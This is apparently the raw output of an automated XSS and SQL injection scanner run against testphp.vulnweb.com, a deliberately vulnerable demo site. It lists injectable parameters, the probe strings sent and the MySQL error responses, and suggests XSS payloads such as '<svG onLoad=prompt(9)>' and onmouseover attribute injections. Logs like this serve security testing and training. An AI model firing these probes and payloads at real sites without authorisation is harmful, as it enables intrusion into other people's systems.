[!] Mogelijke XSS-kwetsbaarheden op testphp.vulnweb.com:
---
[i] URL: http://testphp.vulnweb.com
[i] Response URL: http://testphp.vulnweb.com/search.php?test=query
[i] POST URL: http://testphp.vulnweb.com/search.php?test=query
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjxy'"(){}<x>:/1zqjxy;9
[+] Type: form
[+] Injectiepunten: searchFor
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <h2 id='pagename'>searched for: 1zqjxy'"(){}<x>:/1zqjxy;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjqu'"(){}<x>:/1zqjqu;9
[+] Type: form
[+] Injectiepunten: text
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <img src="/images/remark.gif">&nbsp;&nbsp;1zqjqu'"(){}<x>:/1zqjqu;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjqu'"(){}<x>:/1zqjqu;9
[+] Type: form
[+] Injectiepunten: name
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <strong>1zqjqu'"(){}<x>:/1zqjqu;9

[i] URL: http://testphp.vulnweb.com/login.php
[i] Response URL: http://testphp.vulnweb.com/userinfo.php
[i] POST URL: http://testphp.vulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjwq'"(){}<x>:/1zqjwq;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjdp'%22()%7B%7D%3Cx%3E:/1zqjdp;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdp'"(){}<x>:/1zqjdp;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvy'%22()%7B%7D%3Cx%3E:/1zqjvy;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvy'"(){}<x>:/1zqjvy;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvy'%22()%7B%7D%3Cx%3E:/1zqjvy;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjvy'"(){}<x>:/1zqjvy;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjvy;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjrg'%22()%7B%7D%3Cx%3E:/1zqjrg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjrg'"(){}<x>:/1zqjrg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjre'%22()%7B%7D%3Cx%3E:/1zqjre;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjre'"(){}<x>:/1zqjre;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjre'%22()%7B%7D%3Cx%3E:/1zqjre;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjre'"(){}<x>:/1zqjre;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjre;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjbj'%22()%7B%7D%3Cx%3E:/1zqjbj;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjbj'"(){}<x>:/1zqjbj;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjbj'%22()%7B%7D%3Cx%3E:/1zqjbj;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjbj'"(){}<x>:/1zqjbj;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjbj;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjme'%22()%7B%7D%3Cx%3E:/1zqjme;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjme'"(){}<x>:/1zqjme;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjme'%22()%7B%7D%3Cx%3E:/1zqjme;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjme'"(){}<x>:/1zqjme;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjme;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjxh'%22()%7B%7D%3Cx%3E:/1zqjxh;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjxh'"(){}<x>:/1zqjxh;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x" onmouseover=prompt(9) ", x"/onmouseover=prompt(9)/", x"><svG onLoad=prompt(9)>
[i] Line: <a href="params.php?p=valid&pp=1zqjxh'"(){}<x>:/1zqjxh;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjgp'%22()%7B%7D%3Cx%3E:/1zqjgp;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjgp'"(){}<x>:/1zqjgp;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjgp'"(){}<x>:/1zqjgp;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjom'%22()%7B%7D%3Cx%3E:/1zqjom;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjom'"(){}<x>:/1zqjom;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjwf'%22()%7B%7D%3Cx%3E:/1zqjwf;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjwf'"(){}<x>:/1zqjwf;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjix'%22()%7B%7D%3Cx%3E:/1zqjix;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjix'"(){}<x>:/1zqjix;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjix'"(){}<x>:/1zqjix;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjei'%22()%7B%7D%3Cx%3E:/1zqjei;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjei'"(){}<x>:/1zqjei;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjei'"(){}<x>:/1zqjei;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjfs'%22()%7B%7D%3Cx%3E:/1zqjfs;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjfs'"(){}<x>:/1zqjfs;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjfs'"(){}<x>:/1zqjfs;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjfj'%22()%7B%7D%3Cx%3E:/1zqjfj;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjfj'"(){}<x>:/1zqjfj;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjfj'"(){}<x>:/1zqjfj;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjcz'%22()%7B%7D%3Cx%3E:/1zqjcz;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjcz'"(){}<x>:/1zqjcz;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjcz'%22()%7B%7D%3Cx%3E:/1zqjcz;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjcz'"(){}<x>:/1zqjcz;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjcz;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjet'%22()%7B%7D%3Cx%3E:/1zqjet;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjet'"(){}<x>:/1zqjet;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjet'%22()%7B%7D%3Cx%3E:/1zqjet;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjet'"(){}<x>:/1zqjet;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjet;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjzk'%22()%7B%7D%3Cx%3E:/1zqjzk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzk'"(){}<x>:/1zqjzk;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjzk'%22()%7B%7D%3Cx%3E:/1zqjzk;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjzk'"(){}<x>:/1zqjzk;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjzk;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjdm'%22()%7B%7D%3Cx%3E:/1zqjdm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdm'"(){}<x>:/1zqjdm;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjfw'%22()%7B%7D%3Cx%3E:/1zqjfw;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjfw'"(){}<x>:/1zqjfw;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjxi'%22()%7B%7D%3Cx%3E:/1zqjxi;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjxi'"(){}<x>:/1zqjxi;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjxi'"(){}<x>:/1zqjxi;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjxg'%22()%7B%7D%3Cx%3E:/1zqjxg;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjxg'"(){}<x>:/1zqjxg;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjxg'"(){}<x>:/1zqjxg;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjkk'%22()%7B%7D%3Cx%3E:/1zqjkk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjkk'"(){}<x>:/1zqjkk;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjyr'%22()%7B%7D%3Cx%3E:/1zqjyr;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjyr'"(){}<x>:/1zqjyr;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjzn'%22()%7B%7D%3Cx%3E:/1zqjzn;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzn'"(){}<x>:/1zqjzn;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjnw'%22()%7B%7D%3Cx%3E:/1zqjnw;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjnw'"(){}<x>:/1zqjnw;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjnw'"(){}<x>:/1zqjnw;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjic'%22()%7B%7D%3Cx%3E:/1zqjic;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjic'"(){}<x>:/1zqjic;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjcv'%22()%7B%7D%3Cx%3E:/1zqjcv;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjcv'"(){}<x>:/1zqjcv;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjcv'"(){}<x>:/1zqjcv;9
